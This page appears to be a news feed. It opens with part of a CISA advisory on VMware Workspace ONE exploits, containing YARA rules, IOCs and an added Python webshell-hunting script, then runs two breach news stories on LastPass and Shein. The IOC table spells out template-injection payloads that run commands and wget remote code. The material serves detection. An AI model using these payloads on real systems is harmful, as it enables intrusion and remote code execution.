    Note: the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.
    Update June 2, 2022:
    The following third-party YARA rule may detect unmodified instances of the Godzilla webshell on infected hosts:
    rule Godzilla_Webshell
    {
     strings:
     $string1 = "TomcatListenerMemShellFromThread"
     $string2 = "String xc ="
     $string3 = "String pass ="
     $string4 = "ServletRequestListener"
     $string5 = "cmds = new String"
     $string6 = "cmd"
     $string7 = "bin/bash"
     $string8 = "getInputStream"
     $string9 = "javax.crypto.Cipher c = javax.crypto.Cipher.getInstance"
     $string10 = "godzilla"
     condition:
     filesize < 20KB and 10 of ($string*)
    }

    The following third-party YARA rule may detect unmodified instances of the TomCat JSP webshell on infected hosts:
    rule Tomcatjsp_Webshell
    {
     strings:
     $string1 = "ExecShellCmd"
     $string2 = "stCommParams"
     $string3 = "nKeyOffset = EncryptData"
     $string4 = "InputStream is = process.getInputStream"
     $string5 = "Process process = Runtime.getRuntime"
     $string6 = "ExecBinary"
     $string7 = "byte bzKey"
     $string8 = "nKeyOffset++"
     $string9 = "HttpServletRequest request, HttpServletResponse response"
     $string10 = "connect_test cmd"
     $string11 = "exec cmd"
     $string12 = "file upload"
     condition:
     filesize < 25KB and 12 of ($string*)
    }

    The following third-party YARA rule may detect unmodified instances of the reverse SOCKS proxy on infected hosts.
    rule reversesocks_tool
    {
     meta:
     md5 = "dc88c5fe715b5f706f9fb92547da948a"
     strings:
     $string1 = "revsocks"
     $string2 = "-connect"
     $string3 = "client:8080 -pass test"
     $string4 = "RSA TESTING KEY"
     $string5 = "SETTINGS_MAX_CONCURRENT_STREAMS"
     $string6 = "Start on the server:"
     $string7 = "closing connection"
     $string8 = "socks 127.0.0.1:1080"
     $string9 = "revsocks -listen :8080"
     condition:
     uint16(0) == 0x457F and filesize < 6MB and 8 of ($string*)
    }

    Update End
    Administrators should conduct behavioral analysis on root accounts of vulnerable systems by: 
    Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960
    Used around April 12–14, 2022 (Updated June 2, 2022)

    Indicator | Notes
    /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")} | Search for this function in /opt/vmware/horizon/workspace/logs/greenbox_web.log (Update June 2, 2022: or /opt/vmware/horizon/workspace/logs/greenbox_web.log*). freemarker.template.utility.Execute may be legitimate but could also indicate malicious shell commands. You should URL decode the logs before searching for freemarker.template.utility.Execute.
    /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget -U "Hello 1.0" -qO - http://[REDACTED]/one")} | As above.
    horizon.jsp (June 2, 2022 Update: jquery.jsp) | 5b0bfda04a1e0d8dcb02556dc4e56e6a (MD5)
    jspy | Update June 2, 2022: C509282c94b504129ac6ef168a3f08a8 (MD5)
    godzilla | Update June 2, 2022: app.jsp, 4cd8366345ad4068feca4d417738b4bd (MD5)

    Update May 25, 2022: see Palo Alto Networks Unit 42 Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others) for additional IOCs to detect possible exploitation or compromise. Note: due to the urgency to share this information, CISA has not yet validated this content.
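    Table 1 gives file hashes, which catch exact copies of the webshells, and the YARA rules above give string conditions, which survive a rename but need a YARA engine on the host. The Python below, added here as an example and not CISA, VMware or third-party code, combines both into a single offline hunt over the Workspace ONE Access web directories: every file is hashed against the Table 1 MD5s, files the hashes miss are tested against the dingo_jspy_webshell rule's string condition rendered in plain Python, and archives sitting in the images directory the advisory names as the tar-ball staging location are flagged. The hashes, the string list and the images path come from this advisory; the archive-suffix heuristic, the temporary-directory demo and the constructed sample files are assumptions.

```python
"""Hunt VMware Workspace ONE Access web directories for the webshells in Table 1.

Added example; not CISA or VMware code. Hashes, the Dingo J-spy string list
and the images staging path come from the advisory. The archive-suffix
heuristic and the demo files are constructed assumptions.
"""
import hashlib
import os
import tempfile

# Known-bad MD5s from Table 1 (lowercased; the advisory lists one in mixed case).
KNOWN_MD5 = {
    "5b0bfda04a1e0d8dcb02556dc4e56e6a": "Dingo J-spy webshell (horizon.jsp / jquery.jsp)",
    "c509282c94b504129ac6ef168a3f08a8": "jspy webshell",
    "4cd8366345ad4068feca4d417738b4bd": "Godzilla webshell (app.jsp)",
}

# The advisory states the collection tar ball was staged in this directory.
STAGING_DIR = "/opt/vmware/horizon/workspace/webapps/SAAS/horizon/images"
ARCHIVE_SUFFIXES = (".tar", ".tgz", ".tar.gz")  # assumed heuristic, not from the advisory

# Strings and condition from the dingo_jspy_webshell YARA rule on this page,
# so renamed or lightly modified copies are still caught when the hash misses.
DINGO_STRINGS = [
    b"dingo.length", b"command = command.trim", b"commandAction", b"PortScan",
    b"InetAddress.getLocalHost", b"DatabaseManager", b"ExecuteCommand",
    b"var command = form.command.value", b"dingody.iteye.com", b"J-Spy ver",
    b"no permission ,die", b"int iPort = Integer.parseInt",
]
DINGO_MAX_SIZE = 50 * 1024  # filesize < 50KB
DINGO_REQUIRED = 12         # 12 of ($string*)


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def matches_dingo_rule(data: bytes) -> bool:
    """Plain-Python rendering of: filesize < 50KB and 12 of ($string*)."""
    if len(data) >= DINGO_MAX_SIZE:
        return False
    return sum(1 for s in DINGO_STRINGS if s in data) >= DINGO_REQUIRED


def classify(path: str, data: bytes, staging_dir: str = STAGING_DIR):
    """Return (reason, detail) for a suspicious file, or None if nothing matched."""
    digest = md5_hex(data)
    if digest in KNOWN_MD5:
        return ("known-hash", KNOWN_MD5[digest])
    if matches_dingo_rule(data):
        return ("dingo-strings", "Dingo J-spy variant (hash not in Table 1)")
    in_staging = os.path.normpath(os.path.dirname(path)) == os.path.normpath(staging_dir)
    if in_staging and path.lower().endswith(ARCHIVE_SUFFIXES):
        return ("staged-archive", "archive in images directory; review for collected data")
    return None


def hunt(dirs, staging_dir: str = STAGING_DIR):
    """Walk the given directories and return (path, reason, detail) findings."""
    findings = []
    for top in dirs:
        for root, _, names in os.walk(top):
            for name in names:
                path = os.path.join(root, name)
                try:
                    with open(path, "rb") as fh:
                        data = fh.read()
                except OSError:
                    continue  # unreadable or vanished mid-walk; keep hunting
                hit = classify(path, data, staging_dir)
                if hit:
                    findings.append((path, hit[0], hit[1]))
    return findings


def demo():
    """Build a throwaway tree of constructed files and hunt it (self-contained)."""
    with tempfile.TemporaryDirectory() as tmp:
        portal = os.path.join(tmp, "portal")
        images = os.path.join(tmp, "images")
        os.makedirs(portal)
        os.makedirs(images)
        # Constructed stand-in for a renamed Dingo J-spy copy: carries all 12 strings.
        with open(os.path.join(portal, "renamed.jsp"), "wb") as fh:
            fh.write(b"<%@ page %>\n" + b"\n".join(DINGO_STRINGS) + b"\n")
        # Benign page sharing two of the strings: below the 12-of threshold.
        with open(os.path.join(portal, "index.jsp"), "wb") as fh:
            fh.write(b"<html>DatabaseManager ExecuteCommand</html>")
        # Constructed archive dropped in the (temporary) images directory.
        with open(os.path.join(images, "dump.tar"), "wb") as fh:
            fh.write(b"\0" * 1024)
        return sorted(hunt([tmp], staging_dir=images), key=lambda f: f[1])


if __name__ == "__main__":
    for path, reason, detail in demo():
        print(f"{reason:15} {detail}  <- {path}")
```

    On a live host, call hunt() with the advisory's web directories (the one spelled out in full is /opt/vmware/horizon/workspace/webapps/SAAS/horizon/portal/; the js-lib and cas/static paths are given only as fragments in the advisory, so complete them from the installation). A hash hit is conclusive for the files in Table 1; a string hit says only that the file reads like the Dingo J-spy source, so pull it for review rather than deleting it, and treat any archive in the images directory as possible staged exfiltration data.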
    If administrators discover system compromise, CISA recommends they:
    CISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in ED 22-03 Mitigate VMware Vulnerabilities, CISA expects malicious cyber actors to quickly develop a capability to exploit newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy updates in VMware Security Advisory VMSA-2022-0014 or to remove the affected software from the agency network until the updates can be applied.
    CISA encourages recipients of this CSA to report incidents to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870)
    [1] VMware Security Advisory VMSA-2022-0011
    [2] Ibid
    Update June 2, 2022:
    Threat actors and their malware have used the TTPs in table 1 when exploiting CVE-2022-22954 and/or CVE-2022-22960 and conducting related activity. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques.
    Table 2: MITRE ATT&CK TTPs
    File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification [T1222.002]
    Indicator Removal on Host [T1070]
    Archive Collected Data [T1560]
    Update End
    Initial Version: May 18, 2022|May 25, 2022: Added Industry Resource|June 2, 2022: Added Detection Signatures, IOCs, and TTPs

    source

  • Timeline of the latest LastPass data breaches – CSO Online

    On November 30, 2022, password manager LastPass informed customers of a cybersecurity incident following unusual activity within a third-party cloud storage service. While LastPass claims that users’ passwords remain safely encrypted, it admitted that certain elements of customers’ information have been exposed. The security incident was the latest to affect the service in recent times in the wake of unauthorized access to its development environment in August last year, serious vulnerabilities in 2017, a phishing attack in 2016, and a data breach in 2015.
    Here is a timeline of the most recent LastPass data breaches from August to present.
    [Editor’s note: This article, originally published on January 11, 2023, will be updated as new information becomes available.]
    LastPass CEO Karim Toubba wrote to inform LastPass users that the company had detected unusual activity within portions of the LastPass development environment. “We have determined that an unauthorized party gained access to portions of the LastPass development environment through a single compromised developer account and took portions of source code and some proprietary LastPass technical information. Our products and services are operating normally.”
    In response to the incident, LastPass deployed containment and mitigation measures and engaged a cybersecurity and forensics firm, Toubba added. “While our investigation is ongoing, we have achieved a state of containment, implemented additional enhanced security measures, and see no further evidence of unauthorized activity.”
    LastPass announced that it had completed its investigation of the August breach and determined that the attacker did not access any customer data or password vaults. It also confirmed that the access point was a developer’s compromised computer and that the attacker was in the system for a total of four days.
    LastPass notified users of a new security incident that its team was investigating. “We recently detected unusual activity within a third-party cloud storage service, which is currently shared by both LastPass and its affiliate, GoTo. We immediately launched an investigation, engaged Mandiant, a leading security firm, and alerted law enforcement,” Toubba wrote.
    The company determined that an unauthorized party, using information obtained in the August 2022 incident, was able to gain access to certain customers’ information, Toubba said, while stating that passwords remained safely encrypted due to LastPass’s Zero Knowledge architecture. “We are working diligently to understand the scope of the incident and identify what specific information has been accessed. In the meantime, we can confirm that LastPass products and services remain fully functional,” he added. Users were advised to follow best practices around the setup and configuration of LastPass.
    Yoav Iellin, senior researcher at Silverfort, stated that given the vast number of passwords LastPass protects globally, it remains a big attack target. “The company has admitted the threat actor gained access using information obtained in the previous compromise. Exactly what this information is remains unclear, but typically it’s best practice after suffering a breach for the organization to generate new access keys and replace other compromised credentials. This ensures things like cloud storage and backup access keys cannot be reused.”
    Iellin urged users to stay vigilant for updates from the company and to take time to verify these were legitimate before taking any action. “In addition, ensuring you have two-factor authentication on any applications with passwords in LastPass and changing passwords will provide the utmost level of security,” Iellin added.
    In an update on the investigation, Toubba stated source code and technical information stolen from the LastPass development environment were used to target an employee and obtain credentials/keys, which were used to access and decrypt some storage volumes within a cloud-based storage service. “To date, we have determined that once the cloud storage access key and dual storage container decryption keys were obtained, the threat actor copied information from backup that contained basic customer account information and related metadata including company names, end-user names, billing addresses, email addresses, telephone numbers, and the IP addresses from which customers were accessing the LastPass services,” Toubba wrote.
    The threat actor was also able to copy a backup of customer vault data from the encrypted storage container, which is stored in a proprietary binary format that contains both unencrypted data, such as website URLs, as well as fully encrypted sensitive fields such as website usernames and passwords, secure notes, and form-filled data, he added. “There is no evidence that any unencrypted credit card data was accessed.”
    Toubba warned that the threat actor may attempt to use brute force to guess master passwords and decrypt the copies of vault data they took, but because of the hashing and encryption methods used by LastPass it would be extremely difficult to attempt to brute-force guess master passwords for those customers who follow its password best practices, he continued.
    “The threat actor may also target customers with phishing attacks, credential stuffing, or other brute-force attacks against online accounts associated with your LastPass vault.” LastPass added additional logging and alerting capabilities to help detect any further unauthorized activity and is actively rotating all relevant credentials and certificates that may have been affected and supplementing existing endpoint security, Toubba stated. “We are also performing an exhaustive analysis of every account with signs of any suspicious activity within our cloud storage service, adding additional safeguards within this environment, and analyzing all data within this environment to ensure we understand what the threat actor accessed. This remains an ongoing investigation. We have notified law enforcement and relevant regulatory authorities of this incident out of an abundance of caution. In the meantime, our services are running normally, and we continue to operate in a state of heightened alert.”
    An anonymous plaintiff filed a class action lawsuit against LastPass relating to the data breaches. “This is a class action for damages against Defendant for its failure to exercise reasonable care in securing and safeguarding highly sensitive consumer data in connection with a massive, months-long data breach,” the lawsuit read. Highly sensitive data was exposed, it continued, impacting potentially millions of LastPass users, resulting in the unauthorized public release and subsequent misuse of their names, end-user names, billing addresses, email addresses, telephone numbers, IP addresses from which customers were accessing the LastPass service, and customer vault data. The lawsuit claimed that LastPass’ “best practices” were woefully insufficient to protect its users’ private information from compromise and misuse.
    In an update on the ongoing investigation into the security incident, Paddy Srinivasan, CEO of LastPass parent company GoTo, stated that a threat actor exfiltrated encrypted backups from a third-party cloud storage service related to the following products: Central, Pro, join.me, Hamachi, and RemotelyAnywhere. “We also have evidence that a threat actor exfiltrated an encryption key for a portion of the encrypted backups. The affected information, which varies by product, may include account usernames, salted and hashed passwords, a portion of multi-factor authentication (MFA) settings, as well as some product settings and licensing information. In addition, while Rescue and GoToMyPC encrypted databases were not exfiltrated, MFA settings of a small subset of their customers were impacted,” Srinivasan wrote.
    At the time of writing, Srinivasan claimed there was no evidence of exfiltration affecting any other GoTo products other than those referenced or any of GoTo’s production systems. “We are contacting affected customers directly to provide additional information and recommend actionable steps for them to take to further secure their accounts,” Srinivasan added. “Even though all account passwords were salted and hashed in accordance with best practices, out of an abundance of caution, we will also reset the passwords of affected users and/or reauthorize MFA settings where applicable. In addition, we are migrating their accounts onto an enhanced Identity Management Platform, which will provide additional security with more robust authentication and login-based security options.”
    A LastPass update on its second breach confirmed that it was related to the initial incident that ended on August 12, 2022. The company claimed that the connection was not obvious because the attacker’s tactics, techniques, and procedures (TTPs) and the indicators of compromise (IOCs) “were not consistent with those of the first [breach].”
    The second attack did make use of information exfiltrated during the initial incident: valid credentials of a senior DevOps engineer who had access to a shared cloud storage environment. This made it difficult to identify the attacker’s activity, as it appeared to be legitimate. AWS GuardDuty alerts did notify LastPass of anomalous behavior when the attacker attempted to use cloud identity and access management roles for unauthorized activity.
    Michael Hill is the UK editor of CSO Online. He has spent the past five-plus years covering various aspects of the cybersecurity industry, with particular interest in the ever-evolving role of the human-related elements of information security.
    Copyright © 2023 IDG Communications, Inc.

    source

  • Shein Holding Company Fined $1.9m For Not Disclosing Data Breach – Infosecurity Magazine

    Zoetop, the holding company behind retailer giant Romwe and Shein, has been fined $1.9m after it failed to properly inform customers of a data breach that reportedly affected millions of users.
    According to a notice from New York's attorney general's office this week, the 2018 data breach saw Zoetop failing to secure customers' data, not adequately informing customers of it and trying to keep the real impact of the leak quiet.
    The 2018 hack saw credit cards and personal information theft, including names, emails and hashed passwords. The data breach reportedly affected 39 million Shein and seven million Romwe accounts, more than 800,000 of which belonged to New Yorkers.
    "Shein and Romwe's weak digital security measures made it easy for hackers to shoplift consumers' personal data," said New York attorney general Letitia James.
    "[They] must button up their cybersecurity measures to protect consumers from fraud and identity theft. This agreement should send a clear warning to companies that they must strengthen their digital security measures and be transparent with consumers; anything less will not be tolerated."
    More generally, risks connected to an organization not disclosing that it has been breached are substantial, according to Patrick Wragg, cyber incident response manager at Integrity360.
    Talking to Infosecurity, the executive said the first type of risk is financial. 
    "Not only will the organization suffer from operational issues (disruption to service) and therefore loss of revenue, but if they do not disclose the breach to the likes of the ICO (especially if customer data is stolen), the fines are often exponentially bigger than the threat actor ransom itself," Wragg explained.
    Further, companies may suffer reputational and trust risks should they neglect to disclose a data breach.
    "If customers find out that their data was stolen and the company tried to hide the fact, then they will be much less likely to use that company in the future due to trust," Wragg said.
    "Companies/partners will [also] be less likely to do business with a company that has purposely not disclosed a breach because they don't want to get caught in the 'black hole' of negative reception."
    The Zoetop news comes in the wake of a pair of data breaches in Australia that affected subsidiaries of the telecommunications giant Singtel.

    source